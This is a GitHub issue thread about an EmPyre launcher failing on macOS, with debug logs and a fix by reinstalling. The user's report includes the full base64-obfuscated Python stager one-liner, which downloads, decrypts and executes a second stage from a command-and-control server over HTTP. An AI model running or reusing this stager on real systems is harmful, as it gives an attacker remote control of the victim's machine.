### ISSUE TITLE
Launcher Payload not executing on macOS 10.12.2 Pyton 2.7.10

### ISSUE THREAD

**Issue by johnnycannuk** [EmpireProject/EmPyre#43]
## EmPyre Version
1.2

## OS Information (Linux flavor, Python version)

Kali Rolling (latest update) - EmPyre running

Generating Launcher as per your blog post.

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Trying to run generated launcher on macOS 10.12.2 with Python 2.7.10 installed.

Running causes the generated launcher to through the following error:

XXX-MacBook-Pro:EmPyre XXX$ echo "import sys,base64;exec(base64.b64decode('RGRhSnRkSnRxa0t3PSdJbGVKbnRtdG5jTU9SYScKaW1wb3J0IHN5cywgdXJsbGliMjtvPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bc3lzLnZlcnNpb25faW5mb1swXV0sZnJvbWxpc3Q9WydidWlsZF9vcGVuZXInXSkuYnVpbGRfb3BlbmVyKCk7VUE9J01vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwLjExOyBydjo0NS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzQ1LjAnO28uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JyxVQSldO2E9by5vcGVuKCdodHRwOi8vMTkyLjE2OC4xMjUuMjEyOjgwODAvaW5kZXguYXNwJykucmVhZCgpO2tleT0nfGBKbW5USXYuU2l5QG91QjhfZ0NVeFw0Wyg9R0Y1fTwnO1MsaixvdXQ9cmFuZ2UoMjU2KSwwLFtdCmZvciBpIGluIHJhbmdlKDI1Nik6CiAgICBqPShqK1NbaV0rb3JkKGtleVtpJWxlbihrZXkpXSkpJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQppPWo9MApmb3IgY2hhciBpbiBhOgogICAgaT0oaSsxKSUyNTYKICAgIGo9KGorU1tpXSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCiAgICBvdXQuYXBwZW5kKGNocihvcmQoY2hhcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp'));" | python &
[1] 18136
Mikes-MacBook-Pro:EmPyre mikepark$ Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 12, in <module>
TypeError: expected string without null bytes

Decoded and run at the command line:

XXXX-MacBook-Pro:Documents XXX$ python test.py
Traceback (most recent call last):
  File "test.py", line 12, in <module>
    exec(''.join(out))
TypeError: expected string without null bytes

## Any additional information

This is a new install, payload generated on Kali VM, copied to macOS.

**Comment by killswitch-GUI** [comment]
Hey, I just decoded and ran this stager no issue..

**Comment by killswitch-GUI** [comment]
Can you restart and rebuild the Empire instance? I feel like this is a issue in stage 2, also run './empire --debug'

**Comment by johnnycannuk** [comment]
From the debug log:

2017-02-11 20:50:36 EmPyreServer : [*] Initializing HTTP server on 8080
2017-02-11 20:50:36 EmPyre : [*] EmPyre starting up...
2017-02-12 17:56:11 HttpHandler : [*] /index.asp requested from None at 192.168.125.1
2017-02-12 17:56:11 Agents : [*] Sending stager (stage 1) to 192.168.125.1

Looks like its the second stage.

**Comment by johnnycannuk** [comment]
Ok, so I just did a complete re-install and now everything works fine. Null bytes getting into a generated key some where maybe?

Thanks for the help

**Comment by killswitch-GUI** [comment]
ok cool!
